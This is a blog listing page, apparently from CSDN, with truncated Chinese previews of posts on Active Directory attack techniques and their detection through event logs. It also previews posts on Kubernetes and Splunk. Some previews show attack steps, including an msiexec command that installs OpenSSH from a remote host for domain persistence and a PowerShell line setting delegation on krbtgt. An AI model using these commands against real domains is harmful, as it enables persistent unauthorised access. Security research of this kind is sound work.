- 博客(614)
- 资源 (3)
- 收藏
- 关注

原创 AD域安全攻防实践(附攻防矩阵图)
以域控为基础架构,通过域控实现对用户和计算机资源的统一管理,带来便利的同时也成为了最受攻击者重点攻击的集权系统。01、攻击篇针对域控的攻击技术,在Windows通用攻击技术的基础上自成一套技术体系,将AD域攻防分为信息收集、权限提升、凭证窃取、横向移动、权限维持等攻击阶段,把域环境下众多且繁杂的攻击行为映射到ATT&CK,梳理成一个AD域攻防矩阵图。(1)域内信息收集当攻击者获得内网某台域...
2023-03-11 18:01:16
1853
1
原创 巧用OpenSSH进行域内权限维持
最近在Windows服务器上安装OpenSSH,意外发现了一个很有意思的技巧,可用来做域内权限维持,废话不多说,直接上步骤。01、利用方式(1)在已经获得权限的Windows服务器上,使用msiexec安装openssh,一行命令静默安装,不需要任何设置。msiexec /i "http://x.x.x.x/OpenSSH-Win64.msi"(2)在默认安装的情况下,配置文件:C:\Progra...
2023-05-23 08:02:01
17
原创 Splunk DB Connect 连接SQL Server报错
01、问题描述使用Splunk DB Connect 连接SQL Server数据库读取数据时,报错信息如下:驱动程序无法使用安全套接字层(SSL)加密建立与SQL Server的安全连接。The driver could not establish a secure connection to SQL Server by using Secure Sockets Layer (SSL) ...
2023-04-24 13:20:00
40
原创 一个AK/SK泄露检测的实现思路
01、简介在企业上云的过程中,AK/SK泄露导致的数据泄露事件屡见不鲜。在企业混合云架构下,公有云和私有云都存在大量的AccessKey,如何有效地检测可能的AK/SK泄露事件,一直困扰着企业的安全人员。本文提供了一种比较容易实现的思路,完成AK/SK泄露检测能力的构建,实现类似于阿里云云安全中心AK泄露检测的功能,检测GitHub平台公开源代码中是否包含企业所使用的AK/SK敏感信息。02、实现...
2023-04-21 08:00:33
527
原创 云原生安全工具合集
以Docker+K8s为代表的容器技术得到了越来越广泛的应用,从安全攻防的角度,攻击者已经不再满足于容器逃逸,进而攻击整个容器编排平台,如果可以拿下集群管理员权限,其效果不亚于域控失陷。在云原生安全攻防的场景下,甲乙攻防双方对于安全工具的关注点也不一样。本文试图收集一些开源的云原生安全工具,带你一起去了解云原生安全。1、云原生攻防靶场Metarget 是一个脆弱基础设施自动化构建框架,主要用于快速...
2023-04-10 20:13:08
53
原创 Splunk DB Connect 连接MySQL报错CLIENT_PLUGIN_AUTH is required
01、问题描述使用Splunk DB Connect 连接MySQL数据库读库时,报错CLIENT_PLUGIN_AUTH is required,如下图:02、原因分析根据报错信息,查阅相关资料,了解到报错原因:目标数据库为MySQL 5.7,使用的mysql-connector-java-8.0.28.jar,mysql的jar包版本过高。JDBC数据库驱动程序:mysql-con...
2023-03-17 13:44:00
86
原创 splunk 自定义SPL命令关联威胁情报数据
通过自定义SPL命令关联微步情报数据,效果如下:1、安装splunk-sdkcd /data/splunk/etc/apps/search/binpip3 install -t . splunk-sdk2、自定义脚本开发[root@SIEM-P-VC-A001 bin]# more threatquery.py #!/usr/bin/python# -*- coding: ...
2023-03-17 13:07:00
64
原创 K8s集群部署(二进制安装部署详细手册)
一、简介K8s部署主要有两种方式:1、Kubeadm Kubeadm是一个K8s部署工具,提供kubeadm init和kubeadm join,用于快速部署Kubernetes集群。2、二进制 从github下载发行版的二进制包,手动部署每个组件,组成Kubernetes集群。本文通过二进制安装部署的方式在centos7上搭建kubernetes集群...
2023-02-17 19:18:00
613
原创 K8s集群部署(kubeadm安装部署详细手册)
1、简介K8s部署主要有两种方式:1、Kubeadm Kubeadm是一个K8s部署工具,提供kubeadm init和kubeadm join,用于快速部署Kubernetes集群。2、二进制 从github下载发行版的二进制包,手动部署每个组件,组成Kubernetes集群。本文通过kudeadm的方式在centos7上安装kubernetes集群。...
2023-02-17 19:16:00
399
原创 基于AD Event日志监测域委派后门
01、简介域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实现达到维持权限的目的。基于AD Event日志监视对特定 Active Directory 属性的修改,从而发现可疑的域委派后门。02、约束委派攻击场景假设服务账号配置了到域控的约束性委派,当攻击者控制了服务账号,就可以伪造任意用户...
2023-02-06 20:00:19
181
原创 基于AD Event日志监测约束委派攻击
01、简介 假设服务账号配置了到域控的约束性委派,当攻击者获取了服务账号,可以作为变种黄金票据,用作后门权限维持。 基于AD Event日志监测msDS-AllowedToDelegateTo属性的修改,从而发现可疑的约束委派攻击。02、利用方式(1)通过powershell添加test用户到krbtgt的约束委派Import-Module ActiveDirectory$user...
2023-02-06 14:37:00
90
原创 基于AD Event日志监测基于资源的约束委派攻击
01、简介 攻击者在获取到域控权限后,可以利用基于资源的约束委派实现后门,通过对krbtgt用户设置委派属性,以实现达到维持权限的目的。基于AD Event日志监测msDS-AllowedToActOnBehalfOfOtherIdentity属性的修改,从而发现可疑的基于资源的约束委派攻击。02、利用方式(1)设置属性值并查询Set-ADUser krbtgt -Principal...
2023-02-03 18:50:00
87
原创 域内委派攻击
域委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。利用委派可获取域管理员权限域委派主要分为三种:非约束性委派约束性委派基于资源的约束性委派在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。01、非约束委派攻击设置非约束委派主机账号设置非约束委派:活动目录中的computers组内的计算机,双...
2023-01-31 19:28:00
247
原创 Centos8 重启后,同网段可以访问,其他网段访问不了,怎么解决?
现象描述:某应用系统,服务器IP地址:10.224.252.34 ,重启服务器后,同网段10.224.252.0/24 可以正常访问到服务,其他192.168.0.0 网段都无法访问到服务。登录排查:登录服务器查看路由表信息,eth3对应10.224.252.0/24,eth2对应192.0.0.0/8,初步怀疑服务器重启后,eth2 网卡未能正常启动。处理方案:重启网卡eth2后,恢复...
2023-01-30 18:12:00
65
原创 CISSP 考试知识要点总结
第一章:安全与风险管理1.1 安全基本原则(CIA) 机密性(Confidentiality)加密静止数据(整个磁盘、数据库加密)加密传输(IPSec、SSL、PPTP、SSH)中的数据访问控制(物理和技术的) 完整性(Integrity)散列(数据完整性)配置管理(系统完整性)变更控制(进程完整性)访问控制(物理和技术的)软件数字签名传输循环冗余校...
2023-01-29 11:04:00
296
原创 域内权限维持:SID History后门
01、简介每个用户都有一个关联的安全标识符(SID),SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。02、利用方式(1)使用域管理员权限查看test用户的SID History属性PS C:\Users\Ad...
2023-01-29 10:11:00
92
原创 域内权限维持:注入SSP
01、简介SSP(Security Support Provider)是Windows操作系统安全机制的提供者。简单地说,SSP是个DLL文件,主要用来实现Windows操作系统的身份认证功能。在系统启动时,SSP 将被加载到lsass.exe进程中,攻击者通过自定义恶意的DLL文件,在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。这样,即使用户更...
2023-01-29 10:11:00
127
原创 域内权限维持:AdminSDHolder
01、简介AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。如果攻击者能完全控制AdminSDHolder,那么它就能同时控制域内的许多组,这可以作为域内权限维持的方法。02、利用...
2023-01-29 10:11:00
95
原创 域内权限维持:DSRM后门
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。02、利用方式(1)获取域内用户Hash使用mimikatz查看域内用户test的NTL...
2023-01-29 10:10:00
84
原创 域内权限维持:Skeleton Key(万能密码)
01、简介Skeleton Key(万能密码),是一种可以对域内权限进行持久化的操作,通过将Skeleton Key注入到lsass进程,无需重启域控即可生效,而且能够在不影响当前域用户正常登录的情况下,让所有域用户使用同一个万能密码进行登录,它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。02、利用过程(1)尝试以当前用户身份,查看当前网络资源的连接为空...
2023-01-29 10:03:00
245
原创 我的2023年Todo List
2023年,如约而至。回到老家过年,看着许多熟悉的人、熟悉的房子,总感觉一切都好像在昨天。内心难得平静,终于可以停下脚步,去复盘一下自己这一年的经历,收拾一下心情,重新出发。从这几个方面,简单聊聊关于生活,工作和学习。01、生活篇日复一日的生活,似乎很难找到值得回忆的东西,间接性迷茫在杂乱的生活琐事里。我很欣赏那些拥有自己的爱好并长期坚持的人,可能他所坚持热爱的东西,在别人眼里是多么...
2023-01-28 19:16:00
297
原创 2023 Todo List
2023年,如约而至。回到老家过年,看着许多熟悉的人、熟悉的房子,总感觉一切都好像在昨天。内心难得平静,终于可以停下脚步,去复盘一下自己这一年的经历,收拾一下心情,重新出发。从这几个方面,简单聊聊关于生活,工作和学习。01、生活篇日复一日的生活,似乎很难找到值得回忆的东西,间接性迷茫在杂乱的生活琐事里。我很欣赏那些拥有自己的爱好并长期坚持的人,可能他所坚持热爱的东西,在别人眼里是多么地无聊,但试想...
2023-01-28 19:00:25
245
原创 基于AD Event日志监测AdminSDHolder
01、简介AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。如果攻击者能完全控制AdminSDHolder,那么它就能同时控制域内的许多组,这可以作为域内权限维持的方法。基于AD E...
2023-01-16 00:40:00
440
原创 基于AD Event日志识别SID History后门
01、简介每个用户都有一个关联的安全标识符(SID),SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。当攻击者获得了域管理员权限,就可以将SID History作为实现持久化的方法。通过AD Event日志如何找到SID ...
2023-01-13 08:00:16
74
原创 基于AD Event日志识别Skeleton Key后门
01、简介Skeleton Key(万能密码),是一种可以对域内权限进行持久化的操作手法,通过将Skeleton Key注入到lsass进程,无需重启域控即可生效,而且能够在不影响当前域用户正常登录的情况下,让所有域用户使用同一个万能密码进行登录。另外,它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。如何发现Skelenton Key的后门行为,基于AD Ev...
2023-01-11 20:03:00
77
1
原创 基于AD Event日志实时检测DSRM后门
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD E...
2023-01-08 21:23:26
232
原创 基于AD Event日志监测域内信息探测行为
01、简介当攻击者获得内网某台域内服务器的权限,就会以此为起始攻击点,尽可能地去收集域的信息,以获取域控权限作为内网的终极目标。例如,攻击者会在内网中收集域管理员用户列表和特定敏感用户的信息,通过定位域管理员以找到最佳攻击路径,从而拿到域管理员权限。针对域内信息探测的行为,是攻击者入侵的前兆,基于AD Event日志检测攻击者的信息探测行为,就可以预先给安全管理员发出告警,帮助安全管理员找到网络中...
2022-12-25 22:05:38
569
原创 基于AD Event日志识别黄金票据攻击
01、简介黄金票据(Golden Ticket)是基于Kerberos认证的一种攻击方式,常用来做域控权限维持。当攻击者获取到域内krbtgt帐户的SID和HASH,就可以随意伪造域内管理员用户,再加上域帐户krbtgt的密码基本不会更改,即使域管修改了密码,攻击者依然可以通过黄金票据获取域管理员权限。在域环境中,黄金票据无疑是一种特别危险的攻击,是域控权限失陷的特征,基于AD Event日志如何...
2022-12-18 20:08:41
306
1
原创 基于AD Event日志检测哈希传递攻击
01、简介哈希传递攻击是基于NTLM认证的一种攻击方式,当我们获得某个管理员用户的密码哈希值,就可以利用密码哈希值进行横向渗透。在域环境中,只有域管理员的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。基于AD Event日志如何检测哈希传递攻击,这个就是我们今天探讨的话题。02、哈希传递攻击实例(1)使用mimikatz 进行哈希传递获取域控权限在域环境中,当我们获...
2022-12-08 20:29:00
275
原创 基于AD Event日志检测LSASS凭证窃取攻击
01、简介简单介绍一下,LSASS(本地安全机构子系统服务)在本地或域中登录Windows时,用户生成的各种凭证将会存储在LSASS进程的内存中,以便用户不必每次访问系统时重新登录。攻击者在获得起始攻击点后,需要获取目标主机上的相关凭证,以便通过用户凭证进行横向移动,这个技术点最容易关联到的就是获取LSASS内存中保存的用户凭证。一般LSASS窃取凭证有两种方式,第一种就是直接从LSASS...
2022-11-30 00:09:00
395
原创 基于AD Event日志检测NTDS凭据转储攻击
01、简介在域环境里,域内用户hash存储在域控制器(ntds.dit)中的数据库文件中,ntds.dit文件是无法直接被复制的。在这种情况下,我们一般可以利用卷影复制服务(VSS)来实现ntds.dit的拷贝,然后下载进行离线分析和破解用户哈希。02、利用VSS实现ntds.dit文件提取(1)vssadminWindows卷影工具,使用Vssadmin来管理VSS,用来创建和删除卷影...
2022-11-06 23:42:00
309
原创 基于AD Event日志实时检测GPO后门
01、简介在一些勒索病毒的案例中,我们可以看到这样的案例,攻击者通过域控组策略下发勒索病毒加载脚本,从共享服务器下载并执行勒索病毒样本,从而导致内网大规模范围内的病毒感染事件。在域控这种中央集权系统,通过组策略只需要更改一个组策略对象(GPO),就能影响成千上万的计算机,一旦被恶意利用后果不堪设想。基于勒索病毒攻击感染的场景,组策略对象(GPO)的敏感操作需要实时监控,这是保持内网安全所必需的。那...
2022-10-24 08:00:18
996
原创 基于AD Event日志识别域用户密码攻击
01、简介针对域用户密码攻击,攻击者通常都会使用两种攻击方式进行测试,即:暴力破解(Brute Force)和密码喷洒(Password Spraying)。暴力破解(Brute Force)攻击,攻击者通过利用大量猜测和穷举的方式来尝试获取用户口令。密码喷洒(Password Spraying)攻击,针对不同的用户账户使用一两个通用密码进行自动化密码猜测,以此来避免单个账户连续密码猜测被锁定,提...
2022-10-17 08:00:16
1600
原创 基于AD Event日志识别DCShadow攻击
01、简介DCShadow攻击,是攻击者在获取到域管理员权限后,通过将沦陷的主机伪造成域控,将预先设定的对象或对象属性复制到正在运行的域控服务器中。DCSync&DCShadow区别在于,DCSync是从域服务器将数据复制出来,而DCShadow是将伪造的数据复制到域服务器。02、攻击过程示例假设我们已经拿到了某台服务器SYSTEM权限,并从沦陷的服务器中获取到了域管理员的账号密码。第一步...
2022-10-08 08:00:25
251
原创 基于AD Event日志识别DCSync攻击
01、简介DCSync攻击是一种常见的域控攻击方法,利用DCSync导出域内用户的哈希值,本质上就是利用DRS(Directory Replication Service)协议通过 IDL_DRSGetNCChanges 从域控制器复制用户哈希凭据,以便进一步进行利用。02、DCSync攻击手法(1)MimikatzGithub项目地址:https://github.com/gentilkiwi/...
2022-09-07 08:00:04
995
原创 Exchange 暴力破解与防范
针对Exchange漏洞的利用有很多种方式,但大多数攻击手法首先要有一个邮箱账号,所以,最重要的一步就是获取邮箱账号。获取邮箱账号最常见的攻击方式有两种,钓鱼邮件以及暴力破解。本文整理了Exchange暴力破解的方式,以及记录和分享一些防范方面的小技巧。01、Exchange暴力破解(1)OWA登录爆破Exchange邮箱登录界面,默认没有验证码,也没有登录爆破限制,可通过BurpSuite尝试遍...
2022-08-25 08:00:01
1279
原创 获取 Spring heapdump中的密码明文
Actuator是Spring Boot提供的应用系统监控的开源框架。在攻防场景里经常会遇到Actuator配置不当的情况,攻击者可以直接下载heapdump堆转储文件,然后通过一些工具来分析heapdump文件,从而可进一步获取敏感信息。01、jvisualvm分析jvisualvm是jdk自带可视化java监控工具,在cmd命令行直接输入jvisualvm就可以运行这款工具。(1)通过...
2022-07-19 07:32:00
2314
原创 绕过接口参数签名验证
在一些关键业务接口,系统通常会对请求参数进行签名验证,一旦篡改参数服务端就会提示签名校验失败。在黑盒渗透过程中,如果没办法绕过签名校验,那么就无法进一步深入。微信小程序的前端代码很容易被反编译,一旦签名加密算法和密钥暴漏,找到参数的排序规则,那么就可以篡改任意数据并根据算法伪造签名。下面我们将通过两个简单的小程序参数签名绕过的案例,来理解签名逆向的过程。01、常见签名算法...
2022-07-11 08:00:53
2300
原创 记一次Emotet木马处理案例
0x00、前言用户的安全意识相对薄弱,面对来历不明的链接和附件,容易被诱导从而遭受木马的入侵。在日常使用过程中,有时电脑中病毒后会遇到木马查杀不掉的情况,应该是如何处理呢?下面分享一个Emotet木马处理的案例,希望对你有所帮助。0x01、案例说明从流量侧监控到多个用户终端频繁发送邮件,涉及大量收件人与发件人并带有附件,疑似感染木马,用户手动杀软查杀无果。0x02、原因分析既然杀软无法......
2022-06-30 09:06:34
853
1
原创 业务逻辑安全思路总结
在一些关键的业务场景里,我们最应该关注的安全问题是什么呢?想到这,发现挺有意思的,于是我重新去梳理了一下业务逻辑方面的内容,做了一张关于业务逻辑安全的思维导图,在整理的过程中,自己的思路越加清晰。分享给屏幕前的你,希望你亦有所获。如有遗漏,欢迎补充。01、防前端绕过前端校验增加用户体验,后端校验才能保障接口安全性。漏洞案例:支付计价的逻辑写在前端,后端没有做数据校验,从而导致0元支付...
2022-06-21 08:59:00
2909
应急响应实战笔记_2020最新版.pdf
2020-06-24
WAF攻防实战笔记v1.0--Bypass.pdf
2020-03-30
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人